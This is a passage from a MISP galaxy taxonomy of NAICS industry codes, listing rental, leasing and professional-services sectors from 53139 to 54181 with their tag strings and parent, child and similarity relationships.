The tag is: misp-galaxy:naics="53139"

53139 has relationships with:

  • child-of: misp-galaxy:naics="5313" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="531390" with estimative-language:likelihood-probability="likely"

531390

Other Activities Related to Real Estate

The tag is: misp-galaxy:naics="531390"

531390 has relationships with:

  • child-of: misp-galaxy:naics="5313" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="53139" with estimative-language:likelihood-probability="likely"

532

Rental and Leasing Services

The tag is: misp-galaxy:naics="532"

532 has relationships with:

  • child-of: misp-galaxy:naics="53" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5322" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5323" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5324" with estimative-language:likelihood-probability="likely"

5321

Automotive Equipment Rental and Leasing

The tag is: misp-galaxy:naics="5321"

5321 has relationships with:

  • child-of: misp-galaxy:naics="532" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532120" with estimative-language:likelihood-probability="likely"

53211

Passenger Car Rental and Leasing

The tag is: misp-galaxy:naics="53211"

53211 has relationships with:

  • child-of: misp-galaxy:naics="5321" with estimative-language:likelihood-probability="likely"

532111

Passenger Car Rental

The tag is: misp-galaxy:naics="532111"

532111 has relationships with:

  • child-of: misp-galaxy:naics="5321" with estimative-language:likelihood-probability="likely"

532112

Passenger Car Leasing

The tag is: misp-galaxy:naics="532112"

532112 has relationships with:

  • child-of: misp-galaxy:naics="5321" with estimative-language:likelihood-probability="likely"

53212

Truck, Utility Trailer, and RV (Recreational Vehicle) Rental and Leasing

The tag is: misp-galaxy:naics="53212"

53212 has relationships with:

  • child-of: misp-galaxy:naics="5321" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="532120" with estimative-language:likelihood-probability="likely"

532120

Truck, Utility Trailer, and RV (Recreational Vehicle) Rental and Leasing

The tag is: misp-galaxy:naics="532120"

532120 has relationships with:

  • child-of: misp-galaxy:naics="5321" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="53212" with estimative-language:likelihood-probability="likely"

5322

Consumer Goods Rental

The tag is: misp-galaxy:naics="5322"

5322 has relationships with:

  • child-of: misp-galaxy:naics="532" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53228" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532281" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532282" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532283" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532284" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532289" with estimative-language:likelihood-probability="likely"

53221

Consumer Electronics and Appliances Rental

The tag is: misp-galaxy:naics="53221"

53221 has relationships with:

  • child-of: misp-galaxy:naics="5322" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="532210" with estimative-language:likelihood-probability="likely"

532210

Consumer Electronics and Appliances Rental

The tag is: misp-galaxy:naics="532210"

532210 has relationships with:

  • child-of: misp-galaxy:naics="5322" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="53221" with estimative-language:likelihood-probability="likely"

53228

Other Consumer Goods Rental

The tag is: misp-galaxy:naics="53228"

53228 has relationships with:

  • child-of: misp-galaxy:naics="5322" with estimative-language:likelihood-probability="likely"

532281

Formal Wear and Costume Rental

The tag is: misp-galaxy:naics="532281"

532281 has relationships with:

  • child-of: misp-galaxy:naics="5322" with estimative-language:likelihood-probability="likely"

532282

Video Tape and Disc Rental

The tag is: misp-galaxy:naics="532282"

532282 has relationships with:

  • child-of: misp-galaxy:naics="5322" with estimative-language:likelihood-probability="likely"

532283

Home Health Equipment Rental

The tag is: misp-galaxy:naics="532283"

532283 has relationships with:

  • child-of: misp-galaxy:naics="5322" with estimative-language:likelihood-probability="likely"

532284

Recreational Goods Rental

The tag is: misp-galaxy:naics="532284"

532284 has relationships with:

  • child-of: misp-galaxy:naics="5322" with estimative-language:likelihood-probability="likely"

532289

All Other Consumer Goods Rental

The tag is: misp-galaxy:naics="532289"

532289 has relationships with:

  • child-of: misp-galaxy:naics="5322" with estimative-language:likelihood-probability="likely"

5323

General Rental Centers

The tag is: misp-galaxy:naics="5323"

5323 has relationships with:

  • child-of: misp-galaxy:naics="532" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53231" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532310" with estimative-language:likelihood-probability="likely"

53231

General Rental Centers

The tag is: misp-galaxy:naics="53231"

53231 has relationships with:

  • child-of: misp-galaxy:naics="5323" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="532310" with estimative-language:likelihood-probability="likely"

532310

General Rental Centers

The tag is: misp-galaxy:naics="532310"

532310 has relationships with:

  • child-of: misp-galaxy:naics="5323" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="53231" with estimative-language:likelihood-probability="likely"

5324

Commercial and Industrial Machinery and Equipment Rental and Leasing

The tag is: misp-galaxy:naics="5324"

5324 has relationships with:

  • child-of: misp-galaxy:naics="532" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53241" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53242" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532420" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53249" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532490" with estimative-language:likelihood-probability="likely"

53241

Construction, Transportation, Mining, and Forestry Machinery and Equipment Rental and Leasing

The tag is: misp-galaxy:naics="53241"

53241 has relationships with:

  • child-of: misp-galaxy:naics="5324" with estimative-language:likelihood-probability="likely"

532411

Commercial Air, Rail, and Water Transportation Equipment Rental and Leasing

The tag is: misp-galaxy:naics="532411"

532411 has relationships with:

  • child-of: misp-galaxy:naics="5324" with estimative-language:likelihood-probability="likely"

532412

Construction, Mining, and Forestry Machinery and Equipment Rental and Leasing

The tag is: misp-galaxy:naics="532412"

532412 has relationships with:

  • child-of: misp-galaxy:naics="5324" with estimative-language:likelihood-probability="likely"

53242

Office Machinery and Equipment Rental and Leasing

The tag is: misp-galaxy:naics="53242"

53242 has relationships with:

  • child-of: misp-galaxy:naics="5324" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="532420" with estimative-language:likelihood-probability="likely"

532420

Office Machinery and Equipment Rental and Leasing

The tag is: misp-galaxy:naics="532420"

532420 has relationships with:

  • child-of: misp-galaxy:naics="5324" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="53242" with estimative-language:likelihood-probability="likely"

53249

Other Commercial and Industrial Machinery and Equipment Rental and Leasing

The tag is: misp-galaxy:naics="53249"

53249 has relationships with:

  • child-of: misp-galaxy:naics="5324" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="532490" with estimative-language:likelihood-probability="likely"

532490

Other Commercial and Industrial Machinery and Equipment Rental and Leasing

The tag is: misp-galaxy:naics="532490"

532490 has relationships with:

  • child-of: misp-galaxy:naics="5324" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="53249" with estimative-language:likelihood-probability="likely"

533

Lessors of Nonfinancial Intangible Assets (except Copyrighted Works)

The tag is: misp-galaxy:naics="533"

533 has relationships with:

  • child-of: misp-galaxy:naics="53" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5331" with estimative-language:likelihood-probability="likely"

5331

Lessors of Nonfinancial Intangible Assets (except Copyrighted Works)

The tag is: misp-galaxy:naics="5331"

5331 has relationships with:

  • child-of: misp-galaxy:naics="533" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="533110" with estimative-language:likelihood-probability="likely"

53311

Lessors of Nonfinancial Intangible Assets (except Copyrighted Works)

The tag is: misp-galaxy:naics="53311"

53311 has relationships with:

  • child-of: misp-galaxy:naics="5331" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="533110" with estimative-language:likelihood-probability="likely"

533110

Lessors of Nonfinancial Intangible Assets (except Copyrighted Works)

The tag is: misp-galaxy:naics="533110"

533110 has relationships with:

  • child-of: misp-galaxy:naics="5331" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="53311" with estimative-language:likelihood-probability="likely"

54

Professional, Scientific, and Technical Services

The tag is: misp-galaxy:naics="54"

54 has relationships with:

  • parent-of: misp-galaxy:naics="541" with estimative-language:likelihood-probability="likely"

541

Professional, Scientific, and Technical Services

The tag is: misp-galaxy:naics="541"

541 has relationships with:

  • child-of: misp-galaxy:naics="54" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5414" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5415" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5416" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5417" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5419" with estimative-language:likelihood-probability="likely"

5411

Legal Services

The tag is: misp-galaxy:naics="5411"

5411 has relationships with:

  • child-of: misp-galaxy:naics="541" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54119" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541199" with estimative-language:likelihood-probability="likely"

54111

Offices of Lawyers

The tag is: misp-galaxy:naics="54111"

54111 has relationships with:

  • child-of: misp-galaxy:naics="5411" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541110" with estimative-language:likelihood-probability="likely"

541110

Offices of Lawyers

The tag is: misp-galaxy:naics="541110"

541110 has relationships with:

  • child-of: misp-galaxy:naics="5411" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54111" with estimative-language:likelihood-probability="likely"

54112

Offices of Notaries

The tag is: misp-galaxy:naics="54112"

54112 has relationships with:

  • child-of: misp-galaxy:naics="5411" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541120" with estimative-language:likelihood-probability="likely"

541120

Offices of Notaries

The tag is: misp-galaxy:naics="541120"

541120 has relationships with:

  • child-of: misp-galaxy:naics="5411" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54112" with estimative-language:likelihood-probability="likely"

54119

Other Legal Services

The tag is: misp-galaxy:naics="54119"

54119 has relationships with:

  • child-of: misp-galaxy:naics="5411" with estimative-language:likelihood-probability="likely"

541191

Title Abstract and Settlement Offices

The tag is: misp-galaxy:naics="541191"

541191 has relationships with:

  • child-of: misp-galaxy:naics="5411" with estimative-language:likelihood-probability="likely"

541199

All Other Legal Services

The tag is: misp-galaxy:naics="541199"

541199 has relationships with:

  • child-of: misp-galaxy:naics="5411" with estimative-language:likelihood-probability="likely"

5412

Accounting, Tax Preparation, Bookkeeping, and Payroll Services

The tag is: misp-galaxy:naics="5412"

5412 has relationships with:

  • child-of: misp-galaxy:naics="541" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541213" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541214" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541219" with estimative-language:likelihood-probability="likely"

54121

Accounting, Tax Preparation, Bookkeeping, and Payroll Services

The tag is: misp-galaxy:naics="54121"

54121 has relationships with:

  • child-of: misp-galaxy:naics="5412" with estimative-language:likelihood-probability="likely"

541211

Offices of Certified Public Accountants

The tag is: misp-galaxy:naics="541211"

541211 has relationships with:

  • child-of: misp-galaxy:naics="5412" with estimative-language:likelihood-probability="likely"

541213

Tax Preparation Services

The tag is: misp-galaxy:naics="541213"

541213 has relationships with:

  • child-of: misp-galaxy:naics="5412" with estimative-language:likelihood-probability="likely"

541214

Payroll Services

The tag is: misp-galaxy:naics="541214"

541214 has relationships with:

  • child-of: misp-galaxy:naics="5412" with estimative-language:likelihood-probability="likely"

541219

Other Accounting Services

The tag is: misp-galaxy:naics="541219"

541219 has relationships with:

  • child-of: misp-galaxy:naics="5412" with estimative-language:likelihood-probability="likely"

5413

Architectural, Engineering, and Related Services

The tag is: misp-galaxy:naics="5413"

5413 has relationships with:

  • child-of: misp-galaxy:naics="541" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54132" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54133" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541330" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54134" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541340" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54135" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541350" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54136" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541360" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54137" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541370" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54138" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541380" with estimative-language:likelihood-probability="likely"

54131

Architectural Services

The tag is: misp-galaxy:naics="54131"

54131 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541310" with estimative-language:likelihood-probability="likely"

541310

Architectural Services

The tag is: misp-galaxy:naics="541310"

541310 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54131" with estimative-language:likelihood-probability="likely"

54132

Landscape Architectural Services

The tag is: misp-galaxy:naics="54132"

54132 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541320" with estimative-language:likelihood-probability="likely"

541320

Landscape Architectural Services

The tag is: misp-galaxy:naics="541320"

541320 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54132" with estimative-language:likelihood-probability="likely"

54133

Engineering Services

The tag is: misp-galaxy:naics="54133"

54133 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541330" with estimative-language:likelihood-probability="likely"

541330

Engineering Services

The tag is: misp-galaxy:naics="541330"

541330 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54133" with estimative-language:likelihood-probability="likely"

54134

Drafting Services

The tag is: misp-galaxy:naics="54134"

54134 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541340" with estimative-language:likelihood-probability="likely"

541340

Drafting Services

The tag is: misp-galaxy:naics="541340"

541340 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54134" with estimative-language:likelihood-probability="likely"

54135

Building Inspection Services

The tag is: misp-galaxy:naics="54135"

54135 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541350" with estimative-language:likelihood-probability="likely"

541350

Building Inspection Services

The tag is: misp-galaxy:naics="541350"

541350 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54135" with estimative-language:likelihood-probability="likely"

54136

Geophysical Surveying and Mapping Services

The tag is: misp-galaxy:naics="54136"

54136 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541360" with estimative-language:likelihood-probability="likely"

541360

Geophysical Surveying and Mapping Services

The tag is: misp-galaxy:naics="541360"

541360 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54136" with estimative-language:likelihood-probability="likely"

54137

Surveying and Mapping (except Geophysical) Services

The tag is: misp-galaxy:naics="54137"

54137 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541370" with estimative-language:likelihood-probability="likely"

541370

Surveying and Mapping (except Geophysical) Services

The tag is: misp-galaxy:naics="541370"

541370 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54137" with estimative-language:likelihood-probability="likely"

54138

Testing Laboratories and Services

The tag is: misp-galaxy:naics="54138"

54138 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541380" with estimative-language:likelihood-probability="likely"

541380

Testing Laboratories and Services

The tag is: misp-galaxy:naics="541380"

541380 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54138" with estimative-language:likelihood-probability="likely"

5414

Specialized Design Services

The tag is: misp-galaxy:naics="5414"

5414 has relationships with:

  • child-of: misp-galaxy:naics="541" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54141" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541410" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54142" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541420" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54143" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541430" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54149" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541490" with estimative-language:likelihood-probability="likely"

54141

Interior Design Services

The tag is: misp-galaxy:naics="54141"

54141 has relationships with:

  • child-of: misp-galaxy:naics="5414" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541410" with estimative-language:likelihood-probability="likely"

541410

Interior Design Services

The tag is: misp-galaxy:naics="541410"

541410 has relationships with:

  • child-of: misp-galaxy:naics="5414" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54141" with estimative-language:likelihood-probability="likely"

54142

Industrial Design Services

The tag is: misp-galaxy:naics="54142"

54142 has relationships with:

  • child-of: misp-galaxy:naics="5414" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541420" with estimative-language:likelihood-probability="likely"

541420

Industrial Design Services

The tag is: misp-galaxy:naics="541420"

541420 has relationships with:

  • child-of: misp-galaxy:naics="5414" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54142" with estimative-language:likelihood-probability="likely"

54143

Graphic Design Services

The tag is: misp-galaxy:naics="54143"

54143 has relationships with:

  • child-of: misp-galaxy:naics="5414" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541430" with estimative-language:likelihood-probability="likely"

541430

Graphic Design Services

The tag is: misp-galaxy:naics="541430"

541430 has relationships with:

  • child-of: misp-galaxy:naics="5414" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54143" with estimative-language:likelihood-probability="likely"

54149

Other Specialized Design Services

The tag is: misp-galaxy:naics="54149"

54149 has relationships with:

  • child-of: misp-galaxy:naics="5414" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541490" with estimative-language:likelihood-probability="likely"

541490

Other Specialized Design Services

The tag is: misp-galaxy:naics="541490"

541490 has relationships with:

  • child-of: misp-galaxy:naics="5414" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54149" with estimative-language:likelihood-probability="likely"

5415

Computer Systems Design and Related Services

The tag is: misp-galaxy:naics="5415"

5415 has relationships with:

  • child-of: misp-galaxy:naics="541" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54151" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541513" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541519" with estimative-language:likelihood-probability="likely"

54151

Computer Systems Design and Related Services

The tag is: misp-galaxy:naics="54151"

54151 has relationships with:

  • child-of: misp-galaxy:naics="5415" with estimative-language:likelihood-probability="likely"

541511

Custom Computer Programming Services

The tag is: misp-galaxy:naics="541511"

541511 has relationships with:

  • child-of: misp-galaxy:naics="5415" with estimative-language:likelihood-probability="likely"

541512

Computer Systems Design Services

The tag is: misp-galaxy:naics="541512"

541512 has relationships with:

  • child-of: misp-galaxy:naics="5415" with estimative-language:likelihood-probability="likely"

541513

Computer Facilities Management Services

The tag is: misp-galaxy:naics="541513"

541513 has relationships with:

  • child-of: misp-galaxy:naics="5415" with estimative-language:likelihood-probability="likely"

541519

Other Computer Related Services

The tag is: misp-galaxy:naics="541519"

541519 has relationships with:

  • child-of: misp-galaxy:naics="5415" with estimative-language:likelihood-probability="likely"

5416

Management, Scientific, and Technical Consulting Services

The tag is: misp-galaxy:naics="5416"

5416 has relationships with:

  • child-of: misp-galaxy:naics="541" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54161" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541612" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541613" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541614" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541618" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54162" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541620" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54169" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541690" with estimative-language:likelihood-probability="likely"

54161

Management Consulting Services

The tag is: misp-galaxy:naics="54161"

54161 has relationships with:

  • child-of: misp-galaxy:naics="5416" with estimative-language:likelihood-probability="likely"

541611

Administrative Management and General Management Consulting Services

The tag is: misp-galaxy:naics="541611"

541611 has relationships with:

  • child-of: misp-galaxy:naics="5416" with estimative-language:likelihood-probability="likely"

541612

Human Resources Consulting Services

The tag is: misp-galaxy:naics="541612"

541612 has relationships with:

  • child-of: misp-galaxy:naics="5416" with estimative-language:likelihood-probability="likely"

541613

Marketing Consulting Services

The tag is: misp-galaxy:naics="541613"

541613 has relationships with:

  • child-of: misp-galaxy:naics="5416" with estimative-language:likelihood-probability="likely"

541614

Process, Physical Distribution, and Logistics Consulting Services

The tag is: misp-galaxy:naics="541614"

541614 has relationships with:

  • child-of: misp-galaxy:naics="5416" with estimative-language:likelihood-probability="likely"

541618

Other Management Consulting Services

The tag is: misp-galaxy:naics="541618"

541618 has relationships with:

  • child-of: misp-galaxy:naics="5416" with estimative-language:likelihood-probability="likely"

54162

Environmental Consulting Services

The tag is: misp-galaxy:naics="54162"

54162 has relationships with:

  • child-of: misp-galaxy:naics="5416" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541620" with estimative-language:likelihood-probability="likely"

541620

Environmental Consulting Services

The tag is: misp-galaxy:naics="541620"

541620 has relationships with:

  • child-of: misp-galaxy:naics="5416" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54162" with estimative-language:likelihood-probability="likely"

54169

Other Scientific and Technical Consulting Services

The tag is: misp-galaxy:naics="54169"

54169 has relationships with:

  • child-of: misp-galaxy:naics="5416" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541690" with estimative-language:likelihood-probability="likely"

541690

Other Scientific and Technical Consulting Services

The tag is: misp-galaxy:naics="541690"

541690 has relationships with:

  • child-of: misp-galaxy:naics="5416" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54169" with estimative-language:likelihood-probability="likely"

5417

Scientific Research and Development Services

The tag is: misp-galaxy:naics="5417"

5417 has relationships with:

  • child-of: misp-galaxy:naics="541" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54171" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541713" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541714" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541715" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54172" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541720" with estimative-language:likelihood-probability="likely"

54171

Research and Development in the Physical, Engineering, and Life Sciences

The tag is: misp-galaxy:naics="54171"

54171 has relationships with:

  • child-of: misp-galaxy:naics="5417" with estimative-language:likelihood-probability="likely"

541713

Research and Development in Nanotechnology

The tag is: misp-galaxy:naics="541713"

541713 has relationships with:

  • child-of: misp-galaxy:naics="5417" with estimative-language:likelihood-probability="likely"

541714

Research and Development in Biotechnology (except Nanobiotechnology)

The tag is: misp-galaxy:naics="541714"

541714 has relationships with:

  • child-of: misp-galaxy:naics="5417" with estimative-language:likelihood-probability="likely"

541715

Research and Development in the Physical, Engineering, and Life Sciences (except Nanotechnology and Biotechnology)

The tag is: misp-galaxy:naics="541715"

541715 has relationships with:

  • child-of: misp-galaxy:naics="5417" with estimative-language:likelihood-probability="likely"

54172

Research and Development in the Social Sciences and Humanities

The tag is: misp-galaxy:naics="54172"

54172 has relationships with:

  • child-of: misp-galaxy:naics="5417" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541720" with estimative-language:likelihood-probability="likely"

541720

Research and Development in the Social Sciences and Humanities

The tag is: misp-galaxy:naics="541720"

541720 has relationships with:

  • child-of: misp-galaxy:naics="5417" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54172" with estimative-language:likelihood-probability="likely"

5418

Advertising, Public Relations, and Related Services

The tag is: misp-galaxy:naics="5418"

5418 has relationships with:

  • child-of: misp-galaxy:naics="541" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54181" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541810" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54182" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541820" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54183" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541830" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54184" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541840" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54185" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541850" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54186" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541860" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54187" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541870" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54189" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541890" with estimative-language:likelihood-probability="likely"

54181

Advertising Agencies

The tag is: misp-galaxy:naics="54181"

